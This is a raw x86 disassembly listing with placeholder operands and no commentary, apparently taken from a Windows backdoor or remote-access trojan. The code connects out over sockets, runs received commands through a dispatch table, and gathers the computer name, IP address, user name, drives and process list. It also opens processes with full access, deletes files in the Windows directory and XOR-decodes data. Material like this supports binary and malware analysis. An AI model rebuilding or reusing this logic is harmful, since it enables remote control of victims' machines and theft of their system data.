mov edi [ rw-data ]
or ecx 0xffffffff
xor eax eax
lea edx [ esp + 0x18 ]
[ edi ]
not ecx
sub edi ecx
push eax
mov esi edi
mov ebp ecx
mov edi edx
or ecx 0xffffffff
[ edi ]
mov ecx ebp
dec edi
shr ecx 0x2
[ edi ] [ esi ]
push 0x2
push 0x2
mov ecx ebp
push eax
push eax
and ecx 0x3
lea eax [ esp + 0x2c ]
push 0x40000000
[ edi ] [ esi ]
push eax
call [ __import_lookup_table_0(KERNEL32:CreateFileA) ]
mov esi eax
pop ebp
cmp esi 0xffffffff
jne r-xdata
push ebx
call [ __import_lookup_table_3(MSVCRT:free) ]
add esp 0x4
xor eax eax
pop edi
pop esi
pop ebx
add esp 0x408
retn
mov edx [ esp + 0xc ]
lea ecx [ esp + 0x10 ]
push 0x0
push ecx
push edx
push ebx
push esi
call [ WriteFile@IAT ]
push esi
mov edi eax
call [ CloseHandle@IAT ]
test edi edi
push ebx
jne r-xdata
push ebx
call [ __import_lookup_table_3(MSVCRT:free) ]
add esp 0x4
xor eax eax
pop edi
pop esi
pop ebx
add esp 0x408
retn
call [ __import_lookup_table_3(MSVCRT:free) ]
lea eax [ esp + 0x18 ]
push eax
call sub_404e40
add esp 0x8
mov eax 0x1
pop edi
pop esi
pop ebx
add esp 0x408
retn
call [ __import_lookup_table_3(MSVCRT:free) ]
add esp 0x4
xor eax eax
pop edi
pop esi
pop ebx
add esp 0x408
retn
sub_4023d0
sub esp 0x408
lea eax [ esp + 0x8 ]
push ebx
mov ebx [ __import_lookup_table_0(KERNEL32:GetWindowsDirectoryA) ]
push ebp
push esi
push edi
push 0x400
push eax
call ebx
mov edi [ rw-data ]
or ecx 0xffffffff
xor eax eax
lea edx [ esp + 0x18 ]
[ edi ]
not ecx
sub edi ecx
mov esi edi
mov ebp ecx
mov edi edx
or ecx 0xffffffff
[ edi ]
mov ecx ebp
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx ebp
mov ebp [ __import_lookup_table_0(KERNEL32:DeleteFileA) ]
and ecx 0x3
lea eax [ esp + 0x18 ]
[ edi ] [ esi ]
push eax
call ebp
lea ecx [ esp + 0x18 ]
push 0x400
push ecx
call ebx
mov edi [ rw-data ]
or ecx 0xffffffff
xor eax eax
lea edx [ esp + 0x18 ]
[ edi ]
not ecx
sub edi ecx
mov esi edi
mov ebx ecx
mov edi edx
or ecx 0xffffffff
[ edi ]
mov ecx ebx
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx ebx
lea eax [ esp + 0x18 ]
and ecx 0x3
push eax
[ edi ] [ esi ]
call ebp
mov esi [ __import_lookup_table_0(KERNEL32:Sleep) ]
mov ebp [ ioctlsocket@IAT ]
xor ebx ebx
mov edi 0x1
push 0x32
mov [ rw-data ] ebx
mov [ rw-data ] ebx
call esi
call sub_4020c0
test eax eax
jne r-xdata
push eax
call [ closesocket@IAT ]
pop edi
pop esi
pop ebp
pop ebx
add esp 0x408
retn
call sub_401b00
test eax eax
jne r-xdata
call sub_401b60
test eax eax
jne r-xdata
push 0x2710
call esi
call sub_401b00
test eax eax
je r-xdata
call sub_401dd0
test eax eax
jne r-xdata
push 0x2710
call esi
jmp r-xdata
call sub_402a30
test eax eax
jne r-xdata
push 0x2710
call esi
jmp r-xdata
mov eax [ rw-data ]
mov [ rw-data ] ebx
cmp eax ebx
mov [ rw-data ] ebx
je r-xdata
mov edx [ rw-data ]
lea ecx [ esp + 0x10 ]
push ecx
push 0x8004667e
push edx
mov [ esp + 0x1c ] edi
call ebp
lea eax [ esp + 0x14 ]
mov [ rw-data ] edi
push eax
push ebx
push ebx
push sub_402f00
push ebx
push ebx
mov [ rw-data ] bl
call [ __import_lookup_table_0(KERNEL32:CreateThread) ]
mov [ rw-data ] edi
push 0x2710
call esi
jmp r-xdata
cmp [ rw-data ] ebx
je r-xdata
call sub_402c60
push edi
call esi
jmp r-xdata
cmp [ rw-data ] ebx
je r-xdata
sub_402570
sub esp 0x10
mov ecx [ esp + 0x1c ]
push ebx
push esi
push edi
lea eax [ esp + 0xd ]
push 0xa
push eax
push ecx
mov [ esp + 0x18 ] 0x3a
call [ _itoa@IAT ]
mov edx [ esp + 0x3c ]
add esp 0xc
test edx edx
mov edi rw-data
je r-xdata
or ecx 0xffffffff
xor eax eax
[ edi ]
mov ebx [ esp + 0x20 ]
push ebp
not ecx
sub edi ecx
mov eax ecx
mov esi edi
mov edi ebx
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
and ecx 0x3
[ edi ] [ esi ]
mov eax [ rw-data ]
test eax eax
je r-xdata
mov edi rw-data
mov edi [ esp + 0x30 ]
or ecx 0xffffffff
xor eax eax
[ edi ]
not ecx
sub edi ecx
mov esi edi
mov ebp ecx
mov edi ebx
or ecx 0xffffffff
[ edi ]
mov ecx ebp
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx ebp
and ecx 0x3
cmp edx 0x1
[ edi ] [ esi ]
jne r-xdata
or ecx 0xffffffff
mov edi rw-data
xor eax eax
[ edi ]
not ecx
sub edi ecx
mov ebp ecx
mov esi edi
or ecx 0xffffffff
mov edi ebx
[ edi ]
mov ecx ebp
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx ebp
and ecx 0x3
[ edi ] [ esi ]
mov edi [ esp + 0x28 ]
or ecx 0xffffffff
[ edi ]
not ecx
sub edi ecx
mov esi edi
mov ebp ecx
mov edi ebx
or ecx 0xffffffff
[ edi ]
mov ecx ebp
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx ebp
and ecx 0x3
[ edi ] [ esi ]
lea edi [ esp + 0x10 ]
or ecx 0xffffffff
[ edi ]
not ecx
sub edi ecx
mov esi edi
mov ebp ecx
mov edi ebx
or ecx 0xffffffff
[ edi ]
mov ecx ebp
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx ebp
and ecx 0x3
[ edi ] [ esi ]
or ecx 0xffffffff
mov edi rw-data
xor eax eax
[ edi ]
not ecx
sub edi ecx
mov esi edi
mov ebp ecx
or ecx 0xffffffff
mov edi ebx
[ edi ]
mov ecx ebp
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx ebp
and ecx 0x3
[ edi ] [ esi ]
or ecx 0xffffffff
mov edi rw-data
[ edi ]
not ecx
sub edi ecx
mov ebp ecx
mov esi edi
or ecx 0xffffffff
mov edi ebx
[ edi ]
mov ecx ebp
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx ebp
and ecx 0x3
[ edi ] [ esi ]
mov edi [ esp + 0x28 ]
or ecx 0xffffffff
[ edi ]
not ecx
sub edi ecx
mov esi edi
mov ebp ecx
mov edi ebx
or ecx 0xffffffff
[ edi ]
mov ecx ebp
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx ebp
and ecx 0x3
[ edi ] [ esi ]
lea edi [ esp + 0x10 ]
or ecx 0xffffffff
[ edi ]
not ecx
sub edi ecx
mov esi edi
mov ebp ecx
mov edi ebx
or ecx 0xffffffff
[ edi ]
mov ecx ebp
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx ebp
and ecx 0x3
[ edi ] [ esi ]
mov edi rw-data
or ecx 0xffffffff
[ edi ]
not ecx
sub edi ecx
mov esi edi
mov ebp ecx
mov edi ebx
or ecx 0xffffffff
[ edi ]
dec edi
mov ecx ebp
shr ecx 0x2
[ edi ] [ esi ]
mov ecx ebp
pop ebp
and ecx 0x3
cmp edx 0x1
[ edi ] [ esi ]
jne r-xdata
mov edi rw-data
or ecx 0xffffffff
[ edi ]
not ecx
sub edi ecx
mov esi edi
mov ebp ecx
mov edi ebx
or ecx 0xffffffff
[ edi ]
mov ecx ebp
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx ebp
and ecx 0x3
[ edi ] [ esi ]
mov edi rw-data
or ecx 0xffffffff
xor eax eax
[ edi ]
not ecx
sub edi ecx
mov esi edi
mov edx ecx
mov edi ebx
or ecx 0xffffffff
[ edi ]
mov ecx edx
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx edx
and ecx 0x3
[ edi ] [ esi ]
pop edi
pop esi
pop ebx
add esp 0x10
retn
mov edi rw-data
or ecx 0xffffffff
[ edi ]
not ecx
sub edi ecx
push 0xa
mov esi edi
mov edx ecx
mov edi ebx
or ecx 0xffffffff
[ edi ]
mov ecx edx
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx edx
lea eax [ esp + 0x10 ]
and ecx 0x3
push eax
[ edi ] [ esi ]
mov ecx [ esp + 0x3c ]
push ecx
call [ _itoa@IAT ]
lea edi [ esp + 0x18 ]
or ecx 0xffffffff
xor eax eax
add esp 0xc
[ edi ]
not ecx
sub edi ecx
mov esi edi
mov edx ecx
mov edi ebx
or ecx 0xffffffff
[ edi ]
mov ecx edx
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx edx
and ecx 0x3
[ edi ] [ esi ]
mov edi rw-data
or ecx 0xffffffff
[ edi ]
not ecx
sub edi ecx
mov esi edi
mov edx ecx
mov edi ebx
or ecx 0xffffffff
[ edi ]
mov ecx edx
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx edx
and ecx 0x3
[ edi ] [ esi ]
sub_402830
mov eax 0x2008
call sub_405c40
push ebx
mov ebx [ esp + 0x2010 ]
push ebp
mov ebp [ recv@IAT ]
push esi
push edi
xor edi edi
lea esi [ esp + 0x18 ]
mov [ esp + 0x14 ] edi
mov [ esp + 0x10 ] edi
pop edi
pop esi
pop ebp
or eax 0xffffffff
pop ebx
add esp 0x2008
retn
cmp eax 0xffffffff
jne r-xdata
mov al [ esi ]
cmp al 0xd
je r-xdata
call [ WSAGetLastError@IAT ]
cmp eax 0x2733
jne r-xdata
mov eax [ esp + 0x14 ]
inc eax
cmp eax 0x4
mov [ esp + 0x14 ] eax
jge r-xdata
cmp al 0xa
je r-xdata
push 0x1
call [ __import_lookup_table_0(KERNEL32:Sleep) ]
mov eax edi
inc edi
cmp eax 0x1388
jg r-xdata
mov ecx [ esp + 0x10 ]
lea edx [ esp + 0x18 ]
push rw-data
push edx
mov [ esp + ecx + 0x21 ] 0x0
call [ __import_lookup_table_3(MSVCRT:strstr) ]
add esp 0x8
neg eax
sbb eax eax
pop edi
and eax 0x2
pop esi
pop ebp
dec eax
pop ebx
add esp 0x2008
retn
mov eax [ esp + 0x10 ]
inc eax
inc esi
cmp eax 0x2000
mov [ esp + 0x10 ] eax
ja r-xdata
mov [ esp + 0x14 ] 0x0
jmp r-xdata
jmp r-xdata
push 0x1
call [ __import_lookup_table_0(KERNEL32:Sleep) ]
jmp r-xdata
push 0x0
push 0x1
push esi
push ebx
call ebp
test eax eax
je r-xdata
sub_402910
mov eax [ esp + 0x10 ]
push esi
mov esi [ esp + 0xc ]
test esi esi
mov [ eax ] esi
jle r-xdata
pop esi
retn
mov eax [ esp + 0x10 ]
mov ecx [ esp + 0x8 ]
sub ecx eax
mov dl [ ecx + eax ]
xor dl 0x23
mov [ eax ] dl
inc eax
dec esi
jne r-xdata
sub_402940
sub esp 0x104
push esi
lea eax [ esp + 0x4 ]
push edi
push eax
push rw-data
mov [ esp + 0x10 ] 0xff
call [ GetComputerNameA@IAT ]
mov ecx [ esp + 0x8 ]
lea edx [ esp + 0xc ]
push 0xff
push edx
mov [ ecx + rw-data ] 0x0
call [ gethostname@IAT ]
test eax eax
jne r-xdata
mov edi rw-data
lea eax [ esp + 0xc ]
push eax
call [ gethostbyname@IAT ]
test eax eax
je r-xdata
mov edi rw-data
or ecx 0xffffffff
xor eax eax
[ edi ]
not ecx
sub edi ecx
mov eax ecx
mov esi edi
mov edi rw-data
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
and ecx 0x3
[ edi ] [ esi ]
pop edi
pop esi
add esp 0x104
retn
mov ecx [ eax + 0xc ]
mov edx [ ecx ]
mov eax [ edx ]
push eax
call [ inet_ntoa@IAT ]
mov edi eax
jmp r-xdata
or ecx 0xffffffff
xor eax eax
[ edi ]
not ecx
sub edi ecx
mov edx ecx
mov esi edi
mov edi rw-data
shr ecx 0x2
[ edi ] [ esi ]
mov ecx edx
and ecx 0x3
[ edi ] [ esi ]
pop edi
pop esi
add esp 0x104
retn
sub_402a00
mov eax [ esp + 0x4 ]
push eax
call [ gethostbyname@IAT ]
test eax eax
je r-xdata
xor eax eax
retn
mov ecx [ eax + 0xc ]
mov edx [ ecx ]
mov eax [ edx ]
push eax
call [ inet_ntoa@IAT ]
retn
sub_402a30
mov eax [ rw-data ]
sub esp 0x124
test eax eax
push ebx
mov ebx [ htons@IAT ]
push ebp
mov ebp [ connect@IAT ]
push esi
push edi
mov edi [ ioctlsocket@IAT ]
mov esi 0x1
jne r-xdata
push 0x0
push esi
push 0x2
call [ socket@IAT ]
cmp eax 0xffffffff
mov [ rw-data ] eax
jne r-xdata
push 0x0
push esi
push 0x2
mov [ rw-data ] 0x0
call [ socket@IAT ]
cmp eax 0xffffffff
mov [ rw-data ] eax
jne r-xdata
lea ecx [ esp + 0x10 ]
mov [ esp + 0x10 ] esi
push ecx
push 0x8004667e
push eax
call edi
mov ax [ rw-data ]
mov edx [ rw-data ]
push eax
mov [ esp + 0x18 ] 0x3c
mov [ esp + 0x1c ] 0x0
mov [ esp + 0x38 ] edx
mov [ esp + 0x34 ] esi
mov [ esp + 0x20 ] 0x2
call ebx
push rw-data
mov [ esp + 0x22 ] ax
call [ inet_addr@IAT ]
mov edx [ rw-data ]
lea ecx [ esp + 0x1c ]
push 0x10
push ecx
push edx
mov [ esp + 0x2c ] eax
call ebp
mov edx [ rw-data ]
lea eax [ esp + 0x14 ]
push eax
lea ecx [ esp + 0x34 ]
push 0x0
push ecx
inc edx
push 0x0
push edx
call [ select@IAT ]
test eax eax
jg r-xdata
pop edi
pop esi
pop ebp
xor eax eax
pop ebx
add esp 0x124
retn
lea ecx [ esp + 0x10 ]
mov [ esp + 0x10 ] esi
push ecx
push 0x8004667e
push eax
call edi
mov edx [ rw-data ]
push 0xfa10
mov [ esp + 0x18 ] 0x3c
mov [ esp + 0x1c ] 0x0
mov [ esp + 0x38 ] edx
mov [ esp + 0x34 ] esi
mov [ esp + 0x20 ] 0x2
call ebx
mov edx [ rw-data ]
lea ecx [ esp + 0x1c ]
mov [ esp + 0x1e ] ax
mov eax [ rw-data ]
push 0x10
push ecx
push edx
mov [ esp + 0x2c ] eax
call ebp
mov edx [ rw-data ]
lea eax [ esp + 0x14 ]
push eax
lea ecx [ esp + 0x34 ]
push 0x0
push ecx
inc edx
push 0x0
push edx
call [ select@IAT ]
test eax eax
jg r-xdata
pop edi
pop esi
pop ebp
xor eax eax
pop ebx
add esp 0x124
retn
mov [ rw-data ] esi
mov eax [ rw-data ]
push eax
call [ closesocket@IAT ]
pop edi
pop esi
pop ebp
xor eax eax
pop ebx
add esp 0x124
retn
mov eax [ rw-data ]
test eax eax
jne r-xdata
mov eax [ rw-data ]
test eax eax
je r-xdata
mov eax [ rw-data ]
test eax eax
je r-xdata
call sub_4031c0
test eax eax
jne r-xdata
pop edi
pop esi
pop ebp
xor eax eax
pop ebx
add esp 0x124
retn
lea ecx [ esp + 0x2c ]
push ecx
push 0x0
push 0x0
push sub_402f60
push 0x0
push 0x0
call [ __import_lookup_table_0(KERNEL32:CreateThread) ]
test eax eax
mov [ rw-data ] eax
jne r-xdata
push eax
call [ CloseHandle@IAT ]
mov [ rw-data ] 0x0
pop edi
pop esi
pop ebp
pop ebx
add esp 0x124
retn
mov eax esi
pop edi
pop esi
pop ebp
pop ebx
add esp 0x124
retn
mov edx [ rw-data ]
push edx
call [ closesocket@IAT ]
sub_402c60
mov ecx [ rw-data ]
sub esp 0x100
mov eax ecx
push esi
mov esi [ rw-data ]
push edi
mov edi [ rw-data ]
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
and ecx 0x3
[ edi ] [ esi ]
movsx edx [ rw-data ]
mov ecx [ rw-data ]
xor esi esi
mov [ rw-data ] ecx
mov [ rw-data ] edx
mov [ rw-data ] esi
mov [ rw-data ] esi
call [ GetTickCount@IAT ]
mov [ rw-data ] eax
mov eax [ rw-data ]
add eax 0xffffffbe
cmp eax 0x24
ja r-xdata
mov eax [ rw-data ]
mov [ rw-data ] 0x1
cmp eax esi
je r-xdata
jmp [ eax * 4 + jump_table_402e04 ]
pop edi
mov eax 0x1
pop esi
add esp 0x100
retn
mov edi rw-data
or ecx 0xffffffff
xor eax eax
mov [ rw-data ] esi
[ edi ]
not ecx
add ecx 0x4
mov edi rw-data
mov [ esp + 0x9 ] ecx
or ecx 0xffffffff
[ edi ]
not ecx
sub edi ecx
lea edx [ esp + 0xd ]
mov eax ecx
mov esi edi
mov edi edx
mov [ esp + 0x8 ] 0x5a
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
xor eax eax
and ecx 0x3
[ edi ] [ esi ]
mov edi rw-data
or ecx 0xffffffff
[ edi ]
not ecx
add ecx 0x4
push ecx
lea ecx [ esp + 0xc ]
push ecx
call sub_401f50
add esp 0x8
call sub_4039b0
jmp r-xdata
call sub_403740
jmp r-xdata
call sub_403760
jmp r-xdata
call sub_403710
jmp r-xdata
call sub_403360
jmp r-xdata
call sub_403880
jmp r-xdata
call sub_404040
jmp r-xdata
call sub_4038c0
jmp r-xdata
call sub_403970
jmp r-xdata
call sub_403950
jmp r-xdata
call sub_404520
jmp r-xdata
call sub_404540
jmp r-xdata
call sub_404680
jmp r-xdata
call sub_404590
jmp r-xdata
call sub_404f20
jmp r-xdata
call sub_404a00
jmp r-xdata
mov [ rw-data ] esi
jmp r-xdata
call sub_404c90
jmp r-xdata
call sub_4053e0
jmp r-xdata
call sub_405470
jmp r-xdata
call sub_4054b0
jmp r-xdata
call sub_405510
jmp r-xdata
call sub_405550
sub_402ea0
push ebx
mov ebx [ ExitProcess@IAT ]
push ebp
mov ebp [ __import_lookup_table_0(KERNEL32:WaitForSingleObject) ]
push esi
mov esi [ __import_lookup_table_0(KERNEL32:SetEvent) ]
push edi
mov edi [ WSACleanup@IAT ]
push 0x3e8
call [ __import_lookup_table_0(KERNEL32:Sleep) ]
jmp r-xdata
push rw-data
call sub_405ae0
mov ecx [ rw-data ]
add esp 0x4
push ecx
call esi
call edi
push 0x1
call ebx
mov eax [ rw-data ]
push 0x0
push eax
call ebp
test eax eax
jne r-xdata
sub_402f00
push ebx
mov ebx [ GetTickCount@IAT ]
push ebp
push esi
push edi
call ebx
mov ebp [ __import_lookup_table_0(KERNEL32:Sleep) ]
mov edi eax
mov [ rw-data ] edi
call ebx
sub eax [ rw-data ]
cmp eax 0x1b7740
jbe r-xdata
call sub_401b60
mov edi esi
push 0xa
call ebp
jmp r-xdata
mov [ rw-data ] 0x0
mov [ rw-data ] esi
call ebx
mov esi eax
sub eax edi
cmp eax 0xea60
jbe r-xdata
sub_402f60
mov eax 0x2004
call sub_405c40
push ebx
mov ebx [ __import_lookup_table_0(KERNEL32:Sleep) ]
push ebp
mov ebp [ esp + 0x8 ]
push esi
push edi
mov [ rw-data ] 0x0
mov al [ esp + 0x14 ]
call sub_4030c0
test eax eax
je r-xdata
mov [ rw-data ] 0x0
mov edi [ rw-data ]
mov ecx eax
lea esi [ esp + 0x14 ]
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
and ecx 0x3
[ edi ] [ esi ]
sub ebp [ rw-data ]
test ebp ebp
jg r-xdata
mov eax [ rw-data ]
pop edi
pop esi
pop ebp
test eax eax
pop ebx
jne r-xdata
lea eax [ esp + 0x14 ]
push 0x5
push eax
call sub_403140
add esp 0x8
cmp eax 0xffffffff
je r-xdata
mov [ rw-data ] 0x1
xor eax eax
add esp 0x2004
retn 0x4
mov [ rw-data ] 0x0
mov [ rw-data ] 0x0
mov eax [ rw-data ]
test eax eax
jne r-xdata
mov ebp [ esp + 0x15 ]
cmp ebp 0x5
jl r-xdata
push 0x1
call ebx
mov eax [ rw-data ]
test eax eax
jne r-xdata
test ebp ebp
jg r-xdata
mov [ rw-data ] 0x1
jmp r-xdata
push 0x1
call ebx
mov eax [ rw-data ]
test eax eax
je r-xdata
mov al [ rw-data ]
test al al
jne r-xdata
mov al [ esp + 0x14 ]
cmp al 0x5a
jne r-xdata
lea edx [ esp + 0x14 ]
push ebp
push edx
call sub_403140
add esp 0x8
cmp eax 0xffffffff
mov [ rw-data ] eax
je r-xdata
mov [ rw-data ] 0x0
jmp r-xdata
mov [ rw-data ] 0x1
cmp al 0x51
jne r-xdata
mov [ rw-data ] 0x1
jmp r-xdata
mov [ rw-data ] al
sub ebp 0x5
mov [ rw-data ] 0x0
mov ecx [ rw-data ]
push ecx
call [ __import_lookup_table_0(KERNEL32:SetEvent) ]
jmp r-xdata
sub_4030c0
push ecx
push ebx
mov ebx [ __import_lookup_table_0(KERNEL32:Sleep) ]
push ebp
mov ebp [ WSAGetLastError@IAT ]
push esi
mov esi [ recv@IAT ]
push edi
xor edi edi
test eax eax
jle r-xdata
call ebp
cmp eax 0x2733
jne r-xdata
push 0x1
call ebx
jmp r-xdata
mov al [ esp + 0x13 ]
cmp al 0xd
je r-xdata
pop edi
pop esi
pop ebp
xor eax eax
pop ebx
pop ecx
retn
push 0x1
call ebx
jmp r-xdata
mov ecx [ rw-data ]
push 0x0
lea eax [ esp + 0x17 ]
push 0x1
push eax
push ecx
call esi
cmp eax 0xffffffff
jne r-xdata
inc edi
cmp edi 0x4
jge r-xdata
cmp al 0xa
je r-xdata
pop edi
pop esi
pop ebp
mov eax 0x1
pop ebx
pop ecx
retn
push 0x1
xor edi edi
call ebx
jmp r-xdata
sub_403140
push ebx
push ebp
push esi
push edi
mov edi [ esp + 0x18 ]
xor esi esi
xor ebx ebx
cmp edi 0x2000
jle r-xdata
test edi edi
jle r-xdata
mov edi 0x2000
jmp r-xdata
mov eax edi
pop edi
pop esi
pop ebp
pop ebx
retn
mov ebp [ esp + 0x14 ]
add esi eax
xor ebx ebx
call [ WSAGetLastError@IAT ]
cmp eax 0x2733
jne r-xdata
mov edx [ rw-data ]
mov eax edi
sub eax esi
push 0x0
lea ecx [ esi + ebp ]
push eax
push ecx
push edx
call [ recv@IAT ]
test eax eax
jg r-xdata
pop edi
pop esi
pop ebp
or eax 0xffffffff
pop ebx
retn
mov eax ebx
inc ebx
cmp eax 0x1770
jg r-xdata
jmp r-xdata
push 0x1
call [ __import_lookup_table_0(KERNEL32:Sleep) ]
cmp esi edi
jl r-xdata
sub_4031c0
sub esp 0x48c
push ebp
push esi
push edi
mov edi rw-data
or ecx 0xffffffff
xor eax eax
[ edi ]
not ecx
sub edi ecx
lea edx [ esp + 0x9d ]
mov eax ecx
mov esi edi
mov edi edx
mov [ esp + 0x98 ] 0x41
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
xor eax eax
and ecx 0x3
lea edx [ esp + 0x298 ]
[ edi ] [ esi ]
mov edi rw-data
or ecx 0xffffffff
[ edi ]
not ecx
dec ecx
push edx
mov ebp ecx
mov ecx [ rw-data ]
add ebp 0x6
push 0x200
mov [ esp + 0x18 ] 0x0
mov [ esp + ebp + 0xa0 ] ecx
add ebp 0x4
call [ __import_lookup_table_0(KERNEL32:GetLogicalDriveStringsA) ]
test eax eax
je r-xdata
lea edx [ esp + 0x98 ]
push ebp
push edx
mov [ esp + 0xa1 ] ebp
call sub_401f50
add esp 0x8
pop edi
pop esi
pop ebp
add esp 0x48c
retn
mov al [ esp + 0x298 ]
test al al
je r-xdata
push ebx
lea ebx [ esp + 0x29c ]
mov [ esp + 0x1c ] 0x0
push 0x0
push 0x0
push 0x0
push 0x0
push 0x0
lea ecx [ esp + 0x30 ]
push 0x80
push ecx
push ebx
call [ GetVolumeInformationA@IAT ]
test eax eax
jne r-xdata
mov edi ebx
or ecx 0xffffffff
xor eax eax
lea esi [ esp + ebp + 0x9c ]
[ edi ]
not ecx
dec ecx
mov edi ebx
mov edx ecx
or ecx 0xffffffff
inc edx
mov [ esp + 0x10 ] esi
[ edi ]
not ecx
sub edi ecx
push ebx
mov eax ecx
mov esi edi
mov edi [ esp + 0x14 ]
mov [ esp + 0x1c ] edx
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
add ebp edx
and ecx 0x3
[ edi ] [ esi ]
call [ __import_lookup_table_0(KERNEL32:GetDriveTypeA) ]
cmp eax 0x2
mov [ esp + 0x10 ] eax
je r-xdata
pop ebx
lea edi [ esp + 0x1c ]
or ecx 0xffffffff
xor eax eax
lea edx [ esp + ebp + 0x9c ]
[ edi ]
not ecx
sub edi ecx
mov eax ecx
mov esi edi
mov edi edx
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
xor eax eax
and ecx 0x3
[ edi ] [ esi ]
lea edi [ esp + 0x1c ]
or ecx 0xffffffff
[ edi ]
not ecx
mov eax [ esp + 0x14 ]
dec ecx
lea ebp [ ecx + ebp + 0x1 ]
mov ecx [ esp + 0x10 ]
mov [ esp + ebp + 0x9c ] ecx
mov ecx [ esp + 0x18 ]
add eax ecx
add ebp 0x4
mov [ esp + 0x14 ] eax
lea ebx [ esp + eax + 0x29c ]
mov al [ esp + eax + 0x29c ]
test al al
jne r-xdata
sub_403360
mov eax 0x2530
call sub_405c40
push ebx
push esi
push 0x0
push 0x2
mov ebx 0x5
mov [ esp + 0x540 ] 0x43
call CreateToolhelp32Snapshot
mov esi eax
cmp esi 0xffffffff
mov [ esp + 0x8 ] esi
je r-xdata
mov [ esp + 0x539 ] ebx
jmp r-xdata
lea eax [ esp + 0x10 ]
mov [ esp + 0x10 ] 0x128
push eax
push esi
call Process32First
test eax eax
jne r-xdata
push esi
call [ CloseHandle@IAT ]
lea ecx [ esp + 0x538 ]
push ebx
push ecx
mov [ esp + 0x541 ] ebx
call sub_401f50
add esp 0x8
pop esi
pop ebx
add esp 0x2530
retn
push ebp
push edi
push ebp
call [ CloseHandle@IAT ]
lea edi [ esp + 0x3c ]
or ecx 0xffffffff
xor eax eax
lea edx [ esp + 0x240 ]
[ edi ]
not ecx
sub edi ecx
mov eax ecx
mov esi edi
mov edi edx
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
mov eax [ rw-data ]
and ecx 0x3
cmp eax 0x1
[ edi ] [ esi ]
jne r-xdata
lea edx [ esp + 0x140 ]
push edx
push ebp
call sub_404960
add esp 0x8
test eax eax
jne r-xdata
mov ebp [ esp + 0x20 ]
test ebp ebp
jne r-xdata
lea ecx [ esp + 0x240 ]
push 0x5c
push ecx
mov [ esp + 0x1c ] 0x100
call [ __import_lookup_table_3(MSVCRT:strrchr) ]
add esp 0x8
inc eax
mov edi eax
or ecx 0xffffffff
xor eax eax
lea edx [ esp + 0x440 ]
[ edi ]
not ecx
sub edi ecx
mov eax ecx
mov esi edi
mov edi edx
lea edx [ esp + 0x240 ]
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
xor eax eax
and ecx 0x3
[ edi ] [ esi ]
lea edi [ esp + 0x440 ]
or ecx 0xffffffff
[ edi ]
not ecx
sub edi ecx
mov eax ecx
mov esi edi
mov edi edx
lea edx [ esp + 0x140 ]
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
and ecx 0x3
[ edi ] [ esi ]
lea ecx [ esp + 0x14 ]
push ecx
push edx
call [ GetUserNameA@IAT ]
mov edi rw-data
or ecx 0xffffffff
[ edi ]
not ecx
sub edi ecx
lea edx [ esp + 0x140 ]
mov eax ecx
mov esi edi
mov edi edx
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
and ecx 0x3
[ edi ] [ esi ]
lea edi [ esp + 0x240 ]
or ecx 0xffffffff
xor eax eax
lea edx [ esp + ebx + 0x540 ]
[ edi ]
not ecx
sub edi ecx
mov eax ecx
mov esi edi
mov edi edx
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
xor eax eax
and ecx 0x3
[ edi ] [ esi ]
lea edi [ esp + 0x240 ]
or ecx 0xffffffff
[ edi ]
not ecx
dec ecx
lea edi [ esp + 0x140 ]
lea edx [ ebx + ecx + 0x1 ]
or ecx 0xffffffff
mov [ esp + edx + 0x540 ] ebp
add edx 0x4
[ edi ]
not ecx
sub edi ecx
lea ebx [ esp + edx + 0x540 ]
mov eax ecx
mov esi edi
mov edi ebx
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
xor eax eax
and ecx 0x3
[ edi ] [ esi ]
lea edi [ esp + 0x140 ]
or ecx 0xffffffff
[ edi ]
mov eax [ esp + 0x10 ]
not ecx
dec ecx
lea ebx [ edx + ecx + 0x1 ]
mov ecx [ esp + 0x2c ]
lea edx [ esp + 0x18 ]
push edx
mov [ esp + ebx + 0x544 ] ecx
push eax
add ebx 0x4
call Process32Next
test eax eax
jne r-xdata
mov edi rw-data
or ecx 0xffffffff
xor eax eax
lea edx [ esp + 0x240 ]
[ edi ]
not ecx
sub edi ecx
mov eax ecx
mov esi edi
mov edi edx
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
and ecx 0x3
[ edi ] [ esi ]
mov ecx [ esp + 0x20 ]
push ecx
push 0x0
push 0x1f0fff
call [ OpenProcess@IAT ]
mov ebp eax
push ebp
call [ GetPriorityClass@IAT ]
cmp [ rw-data ] 0x2
jne r-xdata
mov esi [ esp + 0x10 ]
pop edi
pop ebp
sub_4035e0
sub esp 0x128
push ebx
mov ebx [ esp + 0x130 ]
push esi
push edi
mov edi [ ebx ]
push 0x0
push 0x2
call CreateToolhelp32Snapshot
mov esi eax
cmp esi 0xffffffff
je r-xdata
pop edi
pop esi
xor eax eax
pop ebx
add esp 0x128
retn
lea eax [ esp + 0xc ]
mov [ esp + 0xc ] 0x128
push eax
push esi
call Process32First
test eax eax
je r-xdata
mov eax [ esp + 0x14 ]
cmp eax edi
